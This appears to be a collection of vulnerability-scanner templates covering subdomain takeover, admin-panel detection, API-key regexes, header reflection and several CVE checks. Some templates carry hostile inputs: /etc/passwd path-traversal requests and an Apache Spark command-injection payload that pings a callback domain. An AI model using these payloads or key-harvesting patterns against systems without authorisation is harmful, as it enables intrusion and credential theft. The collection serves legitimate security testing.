tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - project not found -------------------------------------------------------------------------------- /webview-addjavascript-interface.yaml: 
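# ---- /webview-addjavascript-interface.yaml ----
# Static check over decompiled (smali) Android code for WebView
# addJavascriptInterface(). Every exposed bridge method is reachable from
# page JavaScript, so each hit needs a manual review of what the bridge
# object exposes and which origins the WebView loads.
id: webview-addjavascript-interface

info:
  name: Webview addJavascript Interface Usage
  author: gaurang
  severity: info
  tags: android,file

file:
  - extensions:
      - all

    matchers:
      - type: word
        words:
          - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"

# ---- /X-Client-IP.yaml ----
# Sends a spoofed X-Client-IP header and looks for its value echoed in the
# response body. A reflection means the app reads this client-supplied
# header (IP-allowlist bypass / injection candidate). The match is limited
# to the body; pages that legitimately contain "evil.com" will false-positive.
# Tags were missing, which made the template invisible to tag-based runs.
id: x-client-ip

info:
  name: x-client-ip
  author: Kabilan S
  severity: low
  tags: header,reflection

requests:
  - method: GET
    headers:
      X-Client-IP: "evil.com"
    path:
      - "{{BaseURL}}/"
    matchers:
      - type: word
        part: body
        words:
          - "evil.com"

# ---- /api/mailchimp-api-key.yaml ----
# Mailchimp API key: 32 hex characters followed by the "-usN" datacenter suffix.
id: mailchimp-access-key-value

info:
  name: Mailchimp API Value
  author: puzzlepeaches
  severity: info
  tags: exposure,token,mailchimp

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - "[0-9a-f]{32}-us[0-9]{1,2}"

# ---- /api/sendgrid-api-key.yaml ----
# SendGrid API key: "SG." + 22 chars + "." + 43 chars. A leaked key allows
# sending mail as the account, so verify and report promptly.
id: sendgrid-api-key

info:
  name: Sendgrid API Key Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,sendgrid

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'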
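# ---- /branch-key.yaml ----
# Branch.io live key ("key_live_" + 32 alphanumerics) in checked-in files.
# The original ".{32}" also swallowed quotes, commas and whitespace following a
# shorter match; the character class keeps the extraction to the key itself.
id: branch-key

info:
  name: Branch.io Live Key
  author: 0xh7ml
  severity: info
  reference:
    - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - "key_live_[A-Za-z0-9]{32}"

# ---- /manage-engine-admanager-panel.yaml ----
# ManageEngine ADManager Plus login page.
id: manage-engine-admanager-panel

info:
  name: Manage Engine ADManager Panel
  author: PR3R00T
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/authorization.do"
    matchers:
      - type: word
        words:
          - "ManageEngine - ADManager Plus"

# ---- /sonarqube-token.yaml ----
# A 40-hex token within 50 chars of the word "sonar". SonarQube tokens are
# 40 hex chars, but so are git SHA-1s, which frequently sit next to "sonar.*"
# properties in CI configuration - review hits before reporting.
id: sonarqube-token

info:
  name: SonarQube Token Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,sonarqube

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"

# ---- /stripe-restricted-key.yaml ----
# Stripe restricted keys (rk_live_/rk_test_). A live key is still a credential
# with whatever permissions it was created with; test keys are noise.
id: stripe-restricted-key

info:
  name: Stripe Restricted Key Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,stripe

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - 'rk_(?:live|test)_[0-9a-zA-Z]{24}'

# ---- /surge-takeover.yaml ----
# surge.sh "project not found" page. The body string alone is not proof of a
# takeover: confirm the target's CNAME points at surge.sh and that the project
# name is actually claimable before reporting as high.
id: surge-takeover

info:
  name: surge takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - project not found

# ---- /versa-sdwan.yaml ----
# Versa Networks SD-WAN login page; follows up to two redirects to reach it.
id: versa-sdwan

info:
  name: Versa Networks SD-WAN Application
  author: pdteam
  severity: info
  tags: panel,versa,sdwan

requests:
  - method: GET
    path:
      - "{{BaseURL}}/versa/login.html"

    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "Versa Networks"

# ---- /vm/saferoads-vms-login.yaml ----
# Saferoads VMS login page.
id: saferoads-vms-login

info:
  name: Saferoads VMS Login
  author: dhiyaneshDk
  severity: info
  reference:
    - https://www.exploit-db.com/ghdb/6941
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login.html'
    matchers:
      - type: word
        words:
          - 'Saferoads VMS'

# ---- /werkzeug-debugger-detect.yaml ----
# Werkzeug/Flask debugger console at /console. The original needle was wrapped
# in an HTML tag that the corpus copy stripped (it survived as a bare,
# line-broken string); the surviving text is matched instead. An exposed
# console is interactive code execution when the debugger PIN protection is
# off - triage hits immediately even though the template is rated "info".
id: werkzeug-debugger-detect

info:
  name: Werkzeug debugger console
  author: pdteam
  severity: info
  tags: tech,werkzeug

requests:
  - method: GET
    path:
      - "{{BaseURL}}/console"

    matchers:
      - type: word
        words:
          - "Interactive Console"
        part: body

# ---- /bmc-panel-detect.yaml ----
# BMC Discovery Outpost admin login page.
id: bmc-panel-detect

info:
  name: BMC Discovery Outpost Panel Detect
  author: pikpikcu
  severity: info
  tags: panel,bmc

requests:
  - method: GET
    path:
      - "{{BaseURL}}/adminlogin"

    matchers:
      - type: word
        part: body
        words:
          - "BMC Discovery Outpost: Login"

# ---- /jkstatus-manager.yaml ----
# Tomcat mod_jk status manager. X-Forwarded-For: 127.0.0.1 is sent to catch
# deployments that gate the page on a client address taken from that header.
id: jkstatus-manager

info:
  name: JK Status Manager
  author: pdteam
  severity: low
  tags: config,status

requests:
  - method: GET
    headers:
      X-Forwarded-For: "127.0.0.1"
    path:
      - "{{BaseURL}}/jkstatus/"
    matchers:
      - type: word
        words:
          - "JK Status Manager"

# ---- /kinsta-takeover.yaml ----
# Kinsta "No Site For Domain" page; confirm the CNAME before reporting.
id: kinsta-takeover

info:
  name: kinsta takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - No Site For Domain

# ---- /X-Remote-Addr.yaml ----
# Same check as X-Client-IP for the X-Remote-Addr header: a spoofed value
# echoed in the body means the app reads this client-supplied header. Match
# limited to the body; tags added so tag-based runs include the template.
id: x-remote-addr

info:
  name: x-remote-addr
  author: Kabilan S
  severity: low
  tags: header,reflection

requests:
  - method: GET
    headers:
      X-Remote-Addr: "evil.com"
    path:
      - "{{BaseURL}}/"
    matchers:
      - type: word
        part: body
        words:
          - "evil.com"

# ---- /api/artifactory-api-token.yaml ----
# Artifactory API token ("AKC" prefix). The leading delimiter alternation is
# part of the match, so extracted values carry one leading character.
id: artifactory-api-token

info:
  name: Artifactory API Token Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,artifactory

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'

# ---- /api/google-api-key.yaml ----
# Google API key ("AIza" + 35 chars). The second path is a deliberately
# non-existent page so the custom 404 page is scanned as well. AIza keys are
# often intended to be public (maps, firebase); check the key's API/referrer
# restrictions before reporting.
id: google-api-key

info:
  name: Google API Key
  author: Swissky
  severity: info
  tags: exposure,token,google

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/hopfully404"

    extractors:
      - type: regex
        part: body
        regex:
          - "AIza[0-9A-Za-z\\-_]{35}"

# ---- /cve/2017/CVE-2017-16877.yaml ----
# Next.js 2.4.1 path traversal under /_next/: a 200 whose body looks like
# /etc/passwd confirms arbitrary file read.
id: CVE-2017-16877

info:
  name: Nextjs v2.4.1 LFI
  author: Loneyer
  severity: high

rules:
  r0:
    request:
      method: GET
      path: /_next/../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# ---- /discord-webhook.yaml ----
# Discord webhook URLs. Discord serves the API on discord.com as well as the
# legacy discordapp.com host, and webhook tokens contain "_" too; the regex now
# covers both hosts and the full token charset. Anyone holding the URL can
# post as the webhook.
id: discord-webhook

info:
  name: Discord Webhook Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,discord

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - 'https://discord(?:app)?\.com/api/webhooks/[0-9]+/[A-Za-z0-9_\-]+'

# ---- /e-vulnerability/ikuai-login-panel.yaml ----
# iKuai flow-control router login page (page title "登录爱快流控路由").
id: ikuai-login-panel

info:
  name: iKuai 登录爱快流控路由登录页面
  author: zan8in
  severity: info
  description: |
    title="登录爱快流控路由"

rules:
  r0:
    request:
      method: GET
      path: /
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b'登录爱快流控路由')
expression: r0()

# ---- /httpbin-detection.yaml ----
# httpbin instance, identified by the GitHub corner link on its index page.
id: httpbin-detection

info:
  name: HTTPBin Detection
  author: Adam Crosser
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/'
    redirects: false

    matchers:
      - type: word
        words:
          - '<a href="https://github.com/requests/httpbin" class="github-corner"'

# ---- /jdbc-connection-string.yaml ----
# JDBC URLs in the root page. Matches can embed credentials (user=/password=
# parameters), which is why this is filed as a token exposure.
id: jdbc-connection-string

info:
  name: JDBC Connection String Disclosure
  author: Ice3man
  severity: unknown
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'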
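# ---- /x-forwarded-for.yaml ----
# Same check as X-Client-IP / X-Remote-Addr for X-Forwarded-For. The original
# matched the bare word "evil", which fires on any page containing that word;
# the full canary "evil.com" is matched, in the body only, as in the siblings.
# Tags added so tag-based runs include the template.
id: x-forwarded-for

info:
  name: x-forwarded-for
  author: Kabilan S
  severity: low
  tags: header,reflection

requests:
  - method: GET
    headers:
      X-Forwarded-For: "evil.com"
    path:
      - "{{BaseURL}}/"
    matchers:
      - type: word
        part: body
        words:
          - "evil.com"

# ---- /a-fingerprinting/django-admin-panel.yaml ----
# Django admin login page.
id: django-admin-panel

info:
  name: Python Django Admin Panel
  author: pdteam
  severity: info
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /admin/login/?next=/admin/
    expression: response.status == 200 && response.body.bcontains(b"<a href=\"/admin/\">Django administration</a>")
expression: r0()

# ---- /a-fingerprinting/sonicwall-management-panel.yaml ----
# SonicWall management authentication page.
id: sonicwall-management-panel

info:
  name: SonicWall Management Panel
  author: PR3R00T
  severity: info
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /auth.html
    expression: response.status == 200 && response.body.bcontains(b'<title>SonicWall - Authentication')
expression: r0()

# ---- /b-disclosure/hadoop-disclosure.yaml ----
# Hadoop NameNode web UI (dfshealth.html) reachable without authentication.
id: hadoop-disclosure

info:
  name: Apache Hadoop Disclosure
  author: zan8in
  severity: low
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /dfshealth.html
    expression: response.status == 200 && response.body.bcontains(b'class="navbar-brand"') && response.body.bcontains(b'dfshealth.js')
expression: r0()

# ---- /c-unauthorized/frp-unauthenticated.yaml ----
# frp server dashboard served without authentication.
id: frp-unauthenticated

info:
  name: FRP Unauthenticated
  author: pikpikcu
  severity: info
  verified: false

rules:
  r0:
    request:
      method: GET
      path: /static
    expression: response.status == 200 && response.body.bcontains(b"frps dashboard")
expression: r0()

# ---- /c-unauthorized/kibana-unauth.yaml ----
# Kibana app reachable without login (welcome view rendered on /app/kibana).
id: kibana-unauth

info:
  name: Kibana Unauth
  author: Isaac(https://github.com/IsaacQiang)
  severity: high
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /app/kibana
    expression: response.status == 200 && response.body.bcontains(b".kibanaWelcomeView")
expression: r0()

# ---- /circleci.yaml ----
# Token-spray check: validates a CircleCI token against circleci.com itself
# (not the scan target). Needs the "token" variable; a 200 from /me means the
# token is live.
id: api-circleci

info:
  name: CircleCI API Test
  author: zzeitlin
  reference: https://circleci.com/docs/api/v1
  severity: info
  tags: token-spray,circle,circleci

requests:
  - method: GET
    path:
      - "https://circleci.com/api/v1.1/me?circle-token={{token}}"

    matchers:
      - type: status
        status:
          - 200

# ---- /cve/2022/CVE-2022-33891.yaml ----
# Apache Spark UI command injection: with ACLs enabled, the "doAs" query
# parameter is interpolated into a shell command. The check injects a ping to
# an out-of-band domain and waits for the callback. The original path,
# "/doAs?=`...`", placed the payload in an empty-named parameter on a "/doAs"
# path and never reached the vulnerable code; the parameter must be named
# doAs. "-c 1" keeps ping from running indefinitely on the target.
id: CVE-2022-33891

info:
  name: Apache Spark shell command injection vulnerability via Spark UI
  author: zan8in
  severity: high

set:
  reverse: newReverse()
  reverseDomain: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /?doAs=`ping+-c+1+{{reverseDomain}}`
    expression: reverse.wait(5)
expression: r0()

# ---- /dynamic-broadcast-receiver.yaml ----
# Static (smali) check for dynamically registered broadcast receivers; each
# hit needs review of whether the receiver is exported without a permission.
id: dynamic-registered-broadcast-receiver

info:
  name: Dynamic Registered Broadcast Receiver
  author: gaurang
  severity: info
  tags: android,file

file:
  - extensions:
      - all

    matchers:
      - type: word
        words:
          - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)"

# ---- /e-vulnerability/myucms-lfr.yaml ----
# MyuCMS arbitrary file read through the bbs download endpoint; a body that
# looks like /etc/passwd confirms it.
id: myucms-lfr

info:
  name: myucms lfr
  author: jinqi
  severity: high

rules:
  r0:
    request:
      method: GET
      path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# ---- /git/github-enterprise-detect.yaml ----
# GitHub Enterprise login page; follows up to two redirects.
id: github-enterprise-detect

info:
  name: Detect Github Enterprise
  author: ehsahil
  severity: info
  tags: panel,github

requests:
  - method: GET
    path:
      - "{{BaseURL}}/login"

    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "GitHub · Enterprise"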
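# ---- /google/google-storage.yaml ----
# Google Cloud Storage bucket behind the target, identified by the
# x-goog-metageneration response header.
id: gstorage-detect

info:
  name: Google Bucket detection
  author: 0xTeles
  severity: info
  tags: tech,gstorage,google,bucket

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - x-goog-metageneration
          - X-Goog-Metageneration
        part: header

# ---- /jazzhr-takeover.yaml ----
# JazzHR "account no longer active" page; confirm the CNAME before reporting.
id: jazzhr-takeover

info:
  name: jazzhr takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - This account no longer active

# ---- /mashery-takeover.yaml ----
# Mashery "Unrecognized domain" page; confirm the CNAME before reporting.
id: mashery-takeover

info:
  name: mashery takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - Unrecognized domain

# ---- /newrelic-synthetics-location-key.yaml ----
# New Relic Synthetics private-location key ("NRSP-" prefix).
id: newrelic-synthetics-location-key

info:
  name: Synthetics Location Key Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'

# ---- /prometheus-exposed-panel.yaml ----
# Prometheus expression browser reachable without authentication; it exposes
# every scraped metric and target.
id: prometheus-exposed-panel

info:
  name: Prometheus.io exposed panel
  author: organiccrap
  severity: low
  tags: panel,prometheus

requests:
  - method: GET
    path:
      - '{{BaseURL}}/graph'

    matchers:
      - type: word
        words:
          - 'Prometheus Time Series Collection and Processing Server'

# ---- /provider-path.yaml ----
# Static check for Android FileProvider <root-path> entries with path="." or
# path="", which share the whole filesystem root through the provider.
id: insecure-provider-path

info:
  name: Insecure Provider Path
  author: gaurang
  severity: medium
  tags: android,file

file:
  - extensions:
      - all

    matchers:
      - type: regex
        regex:
          - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\""
          - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\""

# ---- /selenoid-ui-exposure.yaml ----
# Selenoid UI dashboard; both needles must be present (condition: and).
id: selenoid-ui-exposure

info:
  name: Selenoid UI Dashboard Exposure
  author: pdteam
  severity: medium
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/admin/login'
    matchers:
      - type: word
        words:
          - "Selenoid UI"
          - "/manifest.json"
        condition: and

# ---- /smugmug-takeover.yaml ----
# SmugMug JSON "Page Not Found" response; confirm the CNAME before reporting.
id: smugmug-takeover

info:
  name: smugmug takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - '{"text":"Page Not Found"'

# ---- /surveygizmo-takeover.yaml ----
# SurveyGizmo page. "data-html-name" is a generic attribute name and a weak
# needle on its own; treat hits as leads and verify the CNAME.
id: surveygizmo-takeover

info:
  name: surveygizmo takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - data-html-name

# ---- /tave-takeover.yaml ----
# Tave 404 page. The original needle was an HTML-tagged string that the corpus
# copy stripped to a bare, line-broken string; the surviving text is matched.
# Confirm the CNAME before reporting.
id: tave-takeover

info:
  name: tave takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "Error 404: Page Not Found"

# ---- /ansible-config-disclosure.yaml ----
# ansible.cfg served from the web root; both INI sections must be present.
id: ansible-config-disclosure

info:
  name: Ansible Configuration Exposure
  author: pdteam
  severity: medium
  tags: config,exposure

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ansible.cfg'
    matchers:
      - type: word
        words:
          - '[defaults]'
          - '[inventory]'
        condition: and

# ---- /dotcms-admin-panel.yaml ----
# dotCMS admin login page. matchers-condition is redundant with one matcher
# but harmless.
id: dotcms-admin-panel

info:
  name: dotAdmin Panel
  author: impramodsargar
  severity: info
  tags: panel,dotcms,cms

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dotAdmin/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'dotCMS Content Management Platform'

# ---- /e-vulnerability/web-config.yaml ----
# ASP.NET web.config served as a static file (connection strings, machineKey,
# appSettings). The corpus copy of this rule lost both bcontains() needles
# (b'' matches every body), so every 200 at /web.config was a hit; the
# file format's root element is used as the needle instead. Given what the
# file holds, "info" understates a confirmed hit.
id: web-config

info:
  name: Web Config file
  author: Yash Anand @yashanand155
  severity: info
  tags: config,exposure

rules:
  r0:
    request:
      method: GET
      path: /web.config
    expression: response.status == 200 && response.body.bcontains(b'<configuration') && response.body.bcontains(b'</configuration>')
expression: r0()

# ---- /fastly-takeover.yaml ----
# Fastly "unknown domain" error. Rated info because Fastly services are not
# claimable by string alone; see the linked issue.
id: fastly-takeover

info:
  name: fastly takeover detection
  author: pdcommunity
  severity: info
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "Fastly error: unknown domain:"

# ---- /hatenablog-takeover.yaml ----
# Hatena Blog "Blog is not found" page; confirm the CNAME before reporting.
id: hatenablog-takeover

info:
  name: hatenablog takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 404 Blog is not found

# ---- /lazy-file.yaml ----
# Lazy File Manager (lfm.php) reachable: a web file manager on the host.
id: lazy-file-manager

info:
  name: Lazy File Manager
  author: amsda
  severity: medium
  tags: exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/lfm.php"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - Lazy File Manager

# ---- /readme-takeover.yaml ----
# ReadMe.io "Project doesnt exist" page; confirm the CNAME before reporting.
id: readme-takeover

info:
  name: readme takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'Project doesnt exist... yet!'

# ---- /server-status.yaml ----
# Apache mod_status page exposed to the scanner (client IPs, request URIs,
# server version).
id: server-status-localhost

info:
  name: Server Status Disclosure
  author: pdteam,geeknik
  severity: low
  tags: apache,debug

requests:
  - method: GET
    path:
      - "{{BaseURL}}/server-status"

    matchers:
      - type: word
        words:
          - "Apache Server Status"
          - "Server Version"
        condition: and

# ---- /traefik-dashboard.yaml ----
# Traefik dashboard. The original needle was an HTML-tagged string that the
# corpus copy stripped to "" - and an empty word matches every response at
# /dashboard/. The product name is matched until the exact title string is
# restored (TODO confirm against a live instance).
id: traefik-dashboard-detect

info:
  name: Traefik Dashboard
  author: schniggie,StreetOfHackerR007
  severity: info
  tags: panel,traefik

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dashboard/"
    matchers:
      - type: word
        words:
          - "Traefik"
        part: body

# ---- /webmin/webmin-panel.yaml ----
# Webmin login page, at the root or under /webmin/, following redirects.
id: webmin-panel

info:
  name: Webmin Admin Panel
  author: PR3R00T
  severity: info
  tags: panel,webmin

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/webmin/"
    redirects: true
    matchers:
      - type: word
        words:
          - "Login to Webmin"
        part: body

# ---- /zendesk-takeover.yaml ----
# Zendesk "help center no longer exists" page; confirm the CNAME before reporting.
id: zendesk-takeover

info:
  name: zendesk takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - this help center no longer exists

# ---- /api/artifactory-api-password.yaml ----
# Artifactory encrypted password ("AP" + hex digit prefix). The leading
# delimiter is part of the match, as in the API-token template.
id: artifactory-api-password

info:
  name: Artifactory Password Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,artifactory

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'

# ---- /api/zapier-webhook-token.yaml ----
# Zapier catch-hook URLs; anyone holding one can trigger the Zap. The dot in
# the optional "www." is now escaped (it was an unescaped wildcard).
id: zapier-webhook-token

info:
  name: Zapier Webhook Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - 'https://(?:www\.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'

# ---- /druid-console-exposure.yaml ----
# Alibaba Druid monitoring console served at the root (SQL statements, data
# source config, sessions); both asset references must be present.
id: druid-console-exposure

info:
  name: Alibaba Druid Console Exposure
  author: pdteam
  severity: medium
  tags: panel,alibaba,druid

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        words:
          - 'src="/druid.js"'
          - 'href="/druid.css"'
        condition: and

# ---- /electron-version-detect.yaml ----
# Extracts "electronVersion" from JSON files so the bundled Chromium can be
# checked against known issues (see reference).
id: electron-version-detect

info:
  name: Electron Version Detect
  author: me9187
  severity: info
  reference:
    - https://www.electronjs.org/blog/chromium-rce-vulnerability/
  tags: electron,file

file:
  - extensions:
      - json

    extractors:
      - type: regex
        regex:
          - '"electronVersion":"[^"]*"'

# ---- /exposed-webalizer.yaml ----
# Webalizer usage statistics exposed (referrers, client addresses, URLs).
id: exposed-webalizer

info:
  name: Publicly exposed Webalizer Interface
  author: pdteam
  severity: low
  tags: panel,webalizer

requests:
  - method: GET
    path:
      - '{{BaseURL}}/webalizer/'
    matchers:
      - type: word
        words:
          - "Webalizer Version"
          - "Usage statistics for"
        condition: and

# ---- /feedpress-takeover.yaml ----
# FeedPress "feed has not been found" page. The name said "Agilecrm" (copied
# from the agilecrm template); corrected to match the id and the siblings'
# naming. Confirm the CNAME before reporting.
id: feedpress-takeover

info:
  name: feedpress takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'The feed has not been found.'

# ---- /gemfury-takeover.yaml ----
# Gemfury 404 page. "404: This page could not be found." is also the default
# Next.js 404 title, so any Next.js site returns it; confirm the CNAME targets
# Gemfury before reporting as high.
id: gemfury-takeover

info:
  name: gemfury takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "404: This page could not be found."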
-------------------------------------------------------------------------------- /memcached-stats.yaml: -------------------------------------------------------------------------------- 1 | id: memcached-stats 2 | 3 | info: 4 | name: Memcached stats disclosure 5 | author: pdteam 6 | severity: low 7 | tags: network,memcached 8 | 9 | network: 10 | - inputs: 11 | - data: "stats\r\n\r\nquit\r\n" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | - "{{Host}}:11211" 16 | read-size: 2048 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "STAT " -------------------------------------------------------------------------------- /readthedocs-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readthedocs-takeover 2 | 3 | info: 4 | name: readthedocs takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - unknown to Read the Docs -------------------------------------------------------------------------------- /smartling-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: smartling-takeover 2 | 3 | info: 4 | name: smartling takeover detection 5 | author: pdcommunity 6 | severity: info 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers: 15 | - type: word 16 | words: 17 | - Domain is not configured 18 | -------------------------------------------------------------------------------- /teamwork-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: teamwork-takeover 2 | 3 | info: 4 | name: teamwork takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - 
https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Oops - We didn't find your site. -------------------------------------------------------------------------------- /zoho-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: zoho-webhook-token 2 | 3 | info: 4 | name: Zoho Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,zoho 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+' 18 | -------------------------------------------------------------------------------- /agilecrm-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: agilecrm-takeover 2 | 3 | info: 4 | name: agilecrm takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Sorry, this page is no longer available. -------------------------------------------------------------------------------- /aha-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aha-takeover 2 | 3 | info: 4 | name: Aha Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - There is no portal here ... sending you back to Aha! 
